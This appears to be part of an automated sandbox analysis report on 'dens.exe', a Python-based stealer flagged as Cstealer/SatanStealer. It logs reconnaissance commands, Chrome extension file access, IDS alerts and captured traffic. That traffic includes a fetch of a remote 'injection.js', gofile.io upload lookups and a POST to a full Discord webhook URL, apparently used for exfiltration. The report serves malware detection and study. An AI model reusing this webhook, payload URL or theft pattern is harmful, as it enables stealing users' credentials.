            Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664725190.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666353635.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: dens.exe, 00000000.00000003.1665157382.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057481054.000002D9AA8E0000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665779625.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr

            Spreading

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0F9280 FindFirstFileExW,FindClose,0_2_00007FF62C0F9280
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF62C0F83C0
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C111874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF62C111874
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C0F9280 FindFirstFileExW,FindClose,1_2_00007FF62C0F9280
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C111874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF62C111874
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C0F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF62C0F83C0
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2857287 - Severity 1 - ETPRO MALWARE Python Cstealer/SatanStealer Discord JS Inject Inbound : 185.199.108.133:443 -> 192.168.2.4:49757
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: unknownDNS query: name: ip-api.com
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49744
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49763
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /antivirusevasion23/injection/main/injection.js HTTP/1.1Host: raw.githubusercontent.comAccept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Python/3.12 aiohttp/3.10.5
            Source: global trafficHTTP traffic detected: GET /getServer HTTP/1.1Host: api.gofile.ioAccept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Python/3.12 aiohttp/3.10.5
            Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Python/3.12 aiohttp/3.10.5
            Source: global trafficDNS traffic detected: DNS query: ip-api.com
            Source: global trafficDNS traffic detected: DNS query: discord.com
            Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
            Source: global trafficDNS traffic detected: DNS query: api.gofile.io
            Source: global trafficDNS traffic detected: DNS query: store1.gofile.io
            Source: unknownHTTP traffic detected: POST /api/webhooks/1295868334612418591/QuvcFisisSeqgiaaEigFghTgy3B5fdld_JRxA14GVrqmyygbrLTztN99jPEX8IcFYc7T HTTP/1.1Host: discord.comContent-Type: application/jsonAccept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Python/3.12 aiohttp/3.10.5Content-Length: 1311
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 23:38:54 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1731454736x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E828AVbhGugyqVGLPhmHBb5U4Fg1xGA6Tk2O23S2an1hba95j8VNgqPPFdzhBzB1d3ATG1%2Fpf8QHWFwhMOB1zjvKfP2JKvm%2B1Ku3ylPkM4ERbQzOmOnBttRRLJLI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=b4fe6e672b6a1d8dbc1bc903c4e4d946e08efe60-1731454734; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=jksrHuwgi48AtT.0Eupf2voBCFAB43FLFLVhTeE9FnI-1731454734658-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e1a5bbb3d6d3583-DFW
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 23:38:55 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1731454736x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4JODxRD7CJ9x5uuyA3G0YfusieZaBpUO4%2BbqOIWjAapORqiek10j8s%2FcLVW1hLrP7YtPoEgK4iVRpVb4cf2bHgmLteop%2F3XbRb%2BSTqMCJqRrJtjH8PLOuUd5XJzj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=9dba5449c019f2fb2e6b326e2136aa66df548017-1731454735; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=cKhzjvou17nQeUzv5Xf8o9mP4iIFwtHtb226JZIYU7k-1731454735463-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e1a5bc03bbc2cd2-DFW
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 23:38:57 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1731454738x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PXwzgwwbEGRs1xEifo4GwpCxmbqG7m%2F1ZIUpQCJYe0HNKbi07rOlEItVnZCnTm31pRqOTdvgr1dg0kq0sAUYnBcBDjc3bA2WrJcC5U5Mn0GzVCAq71rsrSmEL9CN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Server: cloudflareCF-RAY: 8e1a5bc5abe93160-DFW
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.1Date: Tue, 12 Nov 2024 23:39:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 14Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-Type, AuthorizationAccess-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEADAccess-Control-Allow-Credentials: trueContent-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: cross-originOrigin-Agent-Cluster: ?1Referrer-Policy: no-referrerStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-DNS-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 0ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 23:39:04 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1731454746x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ulokEnWGzVdH7hLe7hM6A2vOqkNcE0KE1y65WVc8ZvDwIjhqZcZpQbKPvQF8sheBErrWD8hb%2BJuFHZ01kC0lCIIzTD16gbov3KB0pVTsuTd6CvzTlRvcpVS1Jqp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=61c4ad02f8e425b2213084f6302794d3bd4541dd-1731454744; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=tkSDV4PM1uOJpB7hv3ajc8RXfDe2eEs5RpUxYl09GBk-1731454744647-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e1a5bf99b60d5db-DFW
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD6D000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD6D000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663289848.00000107DAD6F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: dens.exe, 00000001.00000003.2042664984.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2044813767.000002D9AADEC000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703441544.000002D9AADC0000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2056068018.000002D9AADC6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2047151959.000002D9AADC1000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703254242.000002D9AADB9000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2044627162.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039084149.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2050122173.000002D9AADC2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040864660.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039859652.000002D9AADEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
            Source: dens.exe, 00000001.00000003.1701312245.000002D9AB206000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701110182.000002D9AB2D7000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041072267.000002D9AB1FB000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701110182.000002D9AB280000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703029573.000002D9AB206000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2051625199.000002D9AB22B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060725211.000002D9AB22B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1701276433.000002D9AB2D7000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2046658607.000002D9AB227000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2043275483.000002D9AB205000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2050345142.000002D9AB22A000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039709379.000002D9AB1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
            Source: powershell.exe, 00000052.00000002.1892090053.00000217AB814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: svchost.exe, 00000034.00000002.2911368637.000001DE8AEBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663289848.00000107DAD6F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD6D000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
